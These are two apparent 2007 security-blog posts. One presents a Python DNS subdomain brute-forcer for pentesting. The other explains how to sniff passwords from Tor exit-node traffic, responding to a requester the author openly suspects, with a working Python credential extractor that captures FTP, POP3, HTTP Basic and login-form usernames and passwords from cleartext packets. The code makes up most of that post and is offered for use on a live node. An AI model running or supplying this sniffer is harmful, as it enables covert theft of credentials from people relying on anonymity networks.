Tuesday, September 11, 2007

Domain Brute Forcer

This morning I found myself in a position where I needed to run a pentest without access to the internet. Sadly, I had also left my toolkit (laptop) at home, as I wasn't expecting to do this test.

Since I didn't have internet access, I couldn't download one of the many domain brute-forcing tools...and that is exactly what I needed.

Since I had some time on my hands, I tossed together my own brute forcer. It's not well coded, but it's proof that you really can pull tools out of your arse in a pinch.


Grab the script here.
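For anyone who wants to see what such a tool boils down to, here is an added example in Python. It is not the author's script (linked above) and not any of the existing brute-forcing tools; the wordlist, the zone contents and the `example.test`/`wild.test` names are all constructed so it runs offline. It tries each word as a label under the target domain and, the one check a quick hack usually forgets, probes for a wildcard record first so a zone that answers every name does not report the whole wordlist as hits.

```python
import socket

# Constructed wordlist; a real run would load a much larger list from a file.
WORDLIST = ["www", "mail", "ftp", "vpn", "dev", "staging", "intranet"]


def dns_resolve(name):
    """Resolve a hostname with the system resolver.

    Returns a sorted list of IPv4/IPv6 addresses, or [] when the name does
    not exist (NXDOMAIN) or cannot be resolved for any other reason."""
    try:
        infos = socket.getaddrinfo(name, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def detect_wildcard(domain, resolve, probe="zz-wildcard-probe-7f3a"):
    """Some zones answer every name (a wildcard record), which would make
    every word in the list look like a hit. Resolve a label that should not
    exist and return the addresses it gives back; an empty set means no wildcard."""
    return set(resolve(f"{probe}.{domain}"))


def brute_force(domain, words, resolve=dns_resolve):
    """Try each word as a label under domain.

    Returns {hostname: [addresses]} for names that resolve to something
    other than the wildcard answer set."""
    wildcard = detect_wildcard(domain, resolve)
    found = {}
    for word in words:
        host = f"{word}.{domain}"
        addrs = resolve(host)
        if not addrs:
            continue
        # A hit that only returns the wildcard addresses tells us nothing.
        if wildcard and set(addrs) <= wildcard:
            continue
        found[host] = addrs
    return found


def make_fake_resolver(zone, wildcard_answer=None):
    """Build an offline stand-in for dns_resolve from a constructed zone dict.

    Names not in the zone get wildcard_answer (or [] for a zone without one)."""
    def resolve(name):
        if name in zone:
            return list(zone[name])
        return list(wildcard_answer or [])
    return resolve


# Constructed zones so the example runs offline (RFC 5737 documentation addresses).
PLAIN_ZONE = {
    "www.example.test": ["192.0.2.10"],
    "mail.example.test": ["192.0.2.20"],
    "vpn.example.test": ["192.0.2.30"],
}
WILDCARD_ZONE = {"mail.wild.test": ["203.0.113.9"]}
WILDCARD_ANSWER = ["203.0.113.5"]


def demo():
    """Run both constructed zones; returns the two result dicts for inspection."""
    plain = brute_force("example.test", WORDLIST, make_fake_resolver(PLAIN_ZONE))
    wild = brute_force("wild.test", WORDLIST,
                       make_fake_resolver(WILDCARD_ZONE, WILDCARD_ANSWER))
    return plain, wild


if __name__ == "__main__":
    for result in demo():
        for host, addrs in sorted(result.items()):
            print(host, ", ".join(addrs))
    # Against a live target: brute_force("target.example", WORDLIST)
```

Against a real target you drop the fake resolver and let `brute_force` use `dns_resolve`; the wildcard probe then costs one extra lookup and saves you from a page of false positives. Lookups are sequential here, which is fine for a few hundred words; for a large list you would run them with a thread pool.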

Monday, September 10, 2007

Password Sniffing With TOR

This afternoon I was approached by an individual online who wanted to know if I could tell him how to sniff passwords off TOR as explained here:

http://www.theregister.co.uk/2007/09/10/misuse_of_tor_led_to_embassy_password_breach/

Of course he (or she) claimed that they wanted to prove it couldn't be done - yeah, right.

However, it's really not all that hard. Many TOR exit nodes sniff their exit traffic. Most do so to protect themselves, some do so to capture credentials...there have even been rumors of the feds doing it to locate child porn sites.

Whatever the reason, using Wireshark is a quick and easy way to sniff all the traffic; however, if you have a busy exit node, you'll fill up your hard drive pretty quickly, even if you only capture a few hundred bytes of each packet.

So, back to the question at hand: using ettercap or dsniff will help you capture credentials without recording the full packet.
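To make the difference concrete, here is an added Python example of the approach those tools take; it is neither the post's code nor ettercap's or dsniff's, just a stripped-down stand-in for what dsniff does. The packets are constructed inline (RFC 5737 addresses, made-up hosts and credentials) so it runs offline; on a real node you would feed it payloads from the capture interface. It keeps one pending username per flow for FTP/POP3, decodes HTTP Basic headers and pulls user/password fields out of form POSTs, and writes down only the resulting credential record, never the packet.

```python
import base64
import re
from urllib.parse import parse_qs

# Constructed sample "packets": (src, dst, payload). On a real exit node these
# would come from the capture interface (pcap or a live sniffer); here they are
# made up so the example runs offline. Addresses are RFC 5737 documentation ranges.
SAMPLE_PACKETS = [
    ("10.0.0.5:40001", "198.51.100.7:21", b"USER alice\r\n"),
    ("10.0.0.5:40001", "198.51.100.7:21", b"PASS hunter2\r\n"),
    ("10.0.0.9:40002", "198.51.100.8:80",
     b"GET /private HTTP/1.1\r\nHost: mail.example.test\r\n"
     b"Authorization: Basic " + base64.b64encode(b"bob:s3cret") + b"\r\n\r\n"),
    ("10.0.0.9:40003", "198.51.100.8:80",
     b"POST /login HTTP/1.1\r\nHost: www.example.test\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 29\r\n\r\n"
     b"username=carol&password=pw%21"),
    ("10.0.0.9:40004", "198.51.100.9:110", b"USER dave\r\n"),
    ("10.0.0.9:40004", "198.51.100.9:110", b"PASS qwerty\r\n"),
    ("10.0.0.9:40005", "198.51.100.8:80", b"GET / HTTP/1.1\r\nHost: www.example.test\r\n\r\n"),
]

BASIC_RE = re.compile(rb"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", re.I | re.M)
# Form field names to treat as username / password (a guess list, as dsniff uses).
USER_FIELDS = ("user", "username", "login", "email", "uid")
PASS_FIELDS = ("pass", "password", "passwd", "pwd")


def extract_http(payload):
    """Return (scheme, user, password) tuples found in one HTTP request."""
    creds = []
    m = BASIC_RE.search(payload)
    if m:
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError; malformed header
            decoded = ""
        if ":" in decoded:
            user, _, pw = decoded.partition(":")
            creds.append(("http-basic", user, pw))
    if payload.startswith(b"POST"):
        _, _, body = payload.partition(b"\r\n\r\n")
        form = parse_qs(body.decode("utf-8", "replace"))
        user = next((form[k][0] for k in USER_FIELDS if k in form), None)
        pw = next((form[k][0] for k in PASS_FIELDS if k in form), None)
        if user is not None and pw is not None:
            creds.append(("http-form", user, pw))
    return creds


def extract_credentials(packets):
    """Walk packets in capture order and keep only credential records.

    Per-flow state is a single pending username awaiting its PASS line, so
    memory and disk stay tiny no matter how busy the node is."""
    pending_user = {}   # (src, dst) -> username seen, waiting for PASS
    records = []
    for src, dst, payload in packets:
        port = int(dst.rsplit(":", 1)[1])
        flow = (src, dst)
        if port in (21, 110):  # FTP and POP3 share the USER/PASS command syntax
            verb, _, arg = payload.decode("ascii", "replace").strip().partition(" ")
            verb = verb.upper()
            if verb == "USER":
                pending_user[flow] = arg
            elif verb == "PASS" and flow in pending_user:
                proto = "ftp" if port == 21 else "pop3"
                records.append((proto, dst, pending_user.pop(flow), arg))
        elif port in (80, 8080):
            for scheme, user, pw in extract_http(payload):
                records.append((scheme, dst, user, pw))
    return records


if __name__ == "__main__":
    for proto, dst, user, pw in extract_credentials(SAMPLE_PACKETS):
        print(f"{proto:10} {dst:20} {user}:{pw}")
```

The output for the sample above is four short records instead of seven packets, which is the whole point versus a full capture. Two caveats: this only sees cleartext protocols, so anything inside TLS (HTTPS, FTPS, POP3S) yields nothing, and real TCP streams need reassembly before parsing, since a POST body or a USER line can be split across segments.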

Now go play nice.